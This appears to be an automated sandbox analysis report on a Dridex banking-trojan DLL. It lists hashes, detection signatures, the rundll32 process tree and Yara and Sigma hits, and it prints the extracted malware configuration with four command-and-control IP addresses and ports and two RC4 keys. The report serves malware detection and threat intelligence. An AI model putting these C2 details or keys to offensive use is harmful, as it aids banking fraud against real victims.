Play interactive tour

Edit tour

Windows Analysis Report hMUh2Mkqyi.dll

Overview

General Information

Sample Name:	hMUh2Mkqyi.dll
Analysis ID:	545441
MD5:	8337dd22aa86bc357f8bc573441a97c7
SHA1:	6dc2600455a42651c95c3b612406dabd1182bfee
SHA256:	0341b7e0b66e27bee166ba1fd9fad700d85e58a257bbfed1b60a662d97fc1617
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Tries to load missing DLLs

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1132 cmdline: loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4756 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4884 cmdline: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 3980 cmdline: rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.314520962.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.351419736.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.309940939.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.313453262.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.317769975.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6ed80000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6ed80000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6ed80000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6ed80000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6ed80000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6ed80000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4756, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1, ProcessId: 4884

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.0.rundll32.exe.6ed80000.5.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Multi AV Scanner detection for submitted file

Show sources

Source: hMUh2Mkqyi.dll	Virustotal: Detection: 64%			Perma Link
Source: hMUh2Mkqyi.dll	ReversingLabs: Detection: 67%

Machine Learning detection for sample

Show sources

Source: hMUh2Mkqyi.dll

Joe Sandbox ML: detected

Source: hMUh2Mkqyi.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: hMUh2Mkqyi.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: oleaut32.pdb! source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.318527592.00000000049C5000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.321398387.000000000536D000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb9 source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbd source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb: source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ntdsapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.346110592.0000000000F42000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.350582062.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb" source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb' source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb# source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb3 source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb- source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbm source: WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdbe source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb, source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbf source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdbn source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.350582062.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: WINMMBASE.pdbn source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb0 source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb6 source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: esent.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: pdh.pdb source: WerFault.exe, 0000000C.00000003.325584158.0000000005041000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb? source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp, hMUh2Mkqyi.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 104.36.167.47:443
Source: Malware configuration extractor	IPs: 188.40.48.93:4664
Source: Malware configuration extractor	IPs: 162.241.33.132:9217
Source: Malware configuration extractor	IPs: 217.160.5.104:593

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: GIGASNET-ASUS GIGASNET-ASUS

Source: Joe Sandbox View	IP Address: 162.241.33.132 162.241.33.132
Source: Joe Sandbox View	IP Address: 104.36.167.47 104.36.167.47

Source: Amcache.hve.12.dr

String found in binary or memory: http://upx.sf.net

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6ed80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6ed80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6ed80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6ed80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6ed80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6ed80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.314520962.000000006ED81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.351419736.000000006ED81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309940939.000000006ED81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.313453262.000000006ED81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.317769975.000000006ED81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: hMUh2Mkqyi.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: hMUh2Mkqyi.dll

Binary or memory string: OriginalFilenameHen.dllD vs hMUh2Mkqyi.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 740

Source: C:\Windows\System32\loaddll32.exe

Section loaded: lz32.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED90730	0_2_6ED90730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED99370	0_2_6ED99370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED8A4E8	0_2_6ED8A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED81494	0_2_6ED81494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED9143C	0_2_6ED9143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED88428	0_2_6ED88428

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED92234 NtDelayExecution,	0_2_6ED92234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED92820 NtAllocateVirtualMemory,	0_2_6ED92820
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED8BB44 NtClose,	0_2_6ED8BB44

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: hMUh2Mkqyi.dll	Virustotal: Detection: 64%
Source: hMUh2Mkqyi.dll	ReversingLabs: Detection: 67%

Source: hMUh2Mkqyi.dll

